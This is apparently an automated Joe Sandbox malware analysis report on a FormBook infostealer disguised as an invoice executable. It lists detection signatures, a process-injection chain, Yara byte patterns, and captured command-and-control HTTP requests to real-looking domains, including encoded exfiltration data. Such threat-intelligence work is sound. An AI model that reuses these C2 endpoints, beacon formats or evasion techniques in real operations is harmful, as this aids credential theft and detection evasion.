Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PROFOMA INVOICE SHEET.exe

Overview

General Information

Sample name:PROFOMA INVOICE SHEET.exe
Analysis ID:1511723
MD5:bc8d560138e7ac511f70880fc394ad2d
SHA1:ab4eba09f7c4ba9e4dda6d9001f310347540d665
SHA256:50298005475ae317206625562212774d14ecad26a7fd979251618b53f5c65d22
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PROFOMA INVOICE SHEET.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe" MD5: BC8D560138E7AC511F70880FC394AD2D)
    • svchost.exe (PID: 7368 cmdline: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • bJWYsPIiPtg.exe (PID: 1508 cmdline: "C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TapiUnattend.exe (PID: 7764 cmdline: "C:\Windows\SysWOW64\TapiUnattend.exe" MD5: D5BFFD755F566AAACB57CF83FDAA5CD0)
          • bJWYsPIiPtg.exe (PID: 5964 cmdline: "C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7920 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c1a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c1a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e5e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16652:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f3e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17452:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", CommandLine: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", CommandLine|base64offset|contains: N !, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", ParentImage: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe, ParentProcessId: 7348, ParentProcessName: PROFOMA INVOICE SHEET.exe, ProcessCommandLine: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", ProcessId: 7368, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", CommandLine: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", CommandLine|base64offset|contains: N !, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", ParentImage: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe, ParentProcessId: 7348, ParentProcessName: PROFOMA INVOICE SHEET.exe, ProcessCommandLine: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", ProcessId: 7368, ProcessName: svchost.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: PROFOMA INVOICE SHEET.exeAvira: detected
            Source: PROFOMA INVOICE SHEET.exeReversingLabs: Detection: 50%
            Source: PROFOMA INVOICE SHEET.exeVirustotal: Detection: 25%Perma Link
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: PROFOMA INVOICE SHEET.exeJoe Sandbox ML: detected
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: TapiUnattend.pdbGCTL source: svchost.exe, 00000001.00000002.2117869256.0000000003619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2117847522.0000000003600000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150058173.0000000000747000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bJWYsPIiPtg.exe, 00000005.00000002.4149955511.00000000006DE000.00000002.00000001.01000000.00000005.sdmp, bJWYsPIiPtg.exe, 00000007.00000000.2210396231.00000000006DE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: PROFOMA INVOICE SHEET.exe, 00000000.00000003.1700292312.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PROFOMA INVOICE SHEET.exe, 00000000.00000003.1701875462.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2019260041.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2017040925.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2140485338.000000000312B000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.000000000347E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2135530288.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PROFOMA INVOICE SHEET.exe, 00000000.00000003.1700292312.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PROFOMA INVOICE SHEET.exe, 00000000.00000003.1701875462.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2019260041.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2017040925.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, TapiUnattend.exe, 00000006.00000003.2140485338.000000000312B000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.000000000347E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2135530288.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: TapiUnattend.exe, 00000006.00000002.4151512701.000000000390C000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.000000000294C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2439300698.000000002304C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: TapiUnattend.exe, 00000006.00000002.4151512701.000000000390C000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.000000000294C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2439300698.000000002304C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: TapiUnattend.pdb source: svchost.exe, 00000001.00000002.2117869256.0000000003619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2117847522.0000000003600000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150058173.0000000000747000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003768EE FindFirstFileW,FindClose,0_2_003768EE
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0037698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0037698F
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0036D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0036D076
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0036D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0036D3A9
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00379642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00379642
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0037979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037979D
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00379B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00379B2B
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0036DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0036DBBE
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00375C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00375C97
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028FC5F0 FindFirstFileW,FindNextFileW,FindClose,6_2_028FC5F0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 4x nop then xor eax, eax6_2_028E9BB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 4x nop then mov ebx, 00000004h6_2_031104E3
            Source: Joe Sandbox ViewIP Address: 136.143.186.12 136.143.186.12
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0037CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0037CE44
            Source: global trafficHTTP traffic detected: GET /lpl9/?h2Pt9=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&4RLhs=7BJLM4eH HTTP/1.1Host: www.aaavvejibej.bondAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /30jd/?h2Pt9=OtDeNxpSfKodwTIu4nnA+ux6enUP6PpldrB0PRj1l4+Fh7wLXn4C+U6iIOCzG6zWS3UsP4q8AKFA04SbUzJ+fbd5Tc1EuJbYoHYXowwdmRoBcyVO6/LzqMo=&4RLhs=7BJLM4eH HTTP/1.1Host: www.whats-in-the-box.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /4hiy/?h2Pt9=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&4RLhs=7BJLM4eH HTTP/1.1Host: www.weatherbook.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /jvjp/?h2Pt9=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&4RLhs=7BJLM4eH HTTP/1.1Host: www.crowsecurity.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /p8sm/?h2Pt9=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks=&4RLhs=7BJLM4eH HTTP/1.1Host: www.inspireplay.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /p2q3/?h2Pt9=FK2L+8PIei1GuvtlS8gCO8fM4ZQmscEbBI34s0k1PsRmujAOjfMM4GbCZxnV6srYixPIeZB0oPqoKkF830AnIDgf70T/wPSZ3Q0Y3Iy42KJKjy26SpAoBvI=&4RLhs=7BJLM4eH HTTP/1.1Host: www.shanhaiguan.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /ivo1/?h2Pt9=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ=&4RLhs=7BJLM4eH HTTP/1.1Host: www.lanxuanz.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /85su/?h2Pt9=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&4RLhs=7BJLM4eH HTTP/1.1Host: www.selftip.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk= HTTP/1.1Host: www.newdaydawning.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /2mtz/?4RLhs=7BJLM4eH&h2Pt9=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0= HTTP/1.1Host: www.o731lh.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /zl4r/?h2Pt9=qAyzze+7Xxv+wA09CtJQAc1N08fgxsYjMF3PXk0d3f7QX0q4Jz2C7sJqIlEgcTB+GqBDI184c5mD0TMdCmIzOUWEYKg5UaPGXuwVBW400SE67lweB1cXDRo=&4RLhs=7BJLM4eH HTTP/1.1Host: www.wajf.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: www.aaavvejibej.bond
            Source: global trafficDNS traffic detected: DNS query: www.whats-in-the-box.org
            Source: global trafficDNS traffic detected: DNS query: www.weatherbook.live
            Source: global trafficDNS traffic detected: DNS query: www.crowsecurity.cloud
            Source: global trafficDNS traffic detected: DNS query: www.inspireplay.live
            Source: global trafficDNS traffic detected: DNS query: www.shanhaiguan.net
            Source: global trafficDNS traffic detected: DNS query: www.lanxuanz.tech
            Source: global trafficDNS traffic detected: DNS query: www.selftip.top
            Source: global trafficDNS traffic detected: DNS query: www.newdaydawning.net
            Source: global trafficDNS traffic detected: DNS query: www.kfowks.site
            Source: global trafficDNS traffic detected: DNS query: www.o731lh.vip
            Source: global trafficDNS traffic detected: DNS query: www.wajf.net
            Source: global trafficDNS traffic detected: DNS query: www.turbonotes.app
            Source: unknownHTTP traffic detected: POST /30jd/ HTTP/1.1Host: www.whats-in-the-box.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflateOrigin: http://www.whats-in-the-box.orgContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 202Referer: http://www.whats-in-the-box.org/30jd/User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Data Raw: 68 32 50 74 39 3d 44 76 72 2b 4f 48 70 57 51 62 73 38 37 68 49 79 6a 33 33 43 37 66 5a 46 52 48 55 35 77 50 39 4b 56 72 4d 64 43 68 4b 39 75 35 2b 69 75 65 55 38 4e 32 45 6c 6f 48 7a 56 64 64 57 47 45 70 69 50 4e 41 68 53 50 34 4f 30 55 4c 39 35 79 34 47 76 63 79 4e 65 65 36 6f 64 53 4c 70 55 6d 76 50 48 78 30 77 76 76 69 59 39 75 51 49 59 63 44 6f 6f 31 73 62 63 32 39 51 65 50 58 6f 2b 58 71 48 37 79 79 73 4a 64 32 70 36 4d 65 64 34 68 2b 39 35 77 6b 38 70 45 46 6a 53 76 57 6e 66 53 4c 47 35 65 4f 43 4e 59 2f 50 76 69 53 4c 39 64 43 6a 30 66 61 46 57 61 4f 64 78 70 46 7a 4d 4e 54 6c 67 73 67 3d 3d Data Ascii: h2Pt9=Dvr+OHpWQbs87hIyj33C7fZFRHU5wP9KVrMdChK9u5+iueU8N2EloHzVddWGEpiPNAhSP4O0UL95y4GvcyNee6odSLpUmvPHx0wvviY9uQIYcDoo1sbc29QePXo+XqH7yysJd2p6Med4h+95wk8pEFjSvWnfSLG5eOCNY/PviSL9dCj0faFWaOdxpFzMNTlgsg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Sep 2024 07:29:57 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pWpR%2BI4f4f%2Brp%2ByE%2BGjg2jCJEDTCiHHL2xIp7cz4mT3EwEw7AY3CST4x6ar8vwQjXnWGGX9GWjVS9UsLLFbmoaeJmhFIudQhL8qC5p1OTkmbVOMYZcJhTsSbTE7JVLWZ3eaGO2fKKg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c3f2600880043be-EWRalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 31 30 Data Ascii: error code: 1010
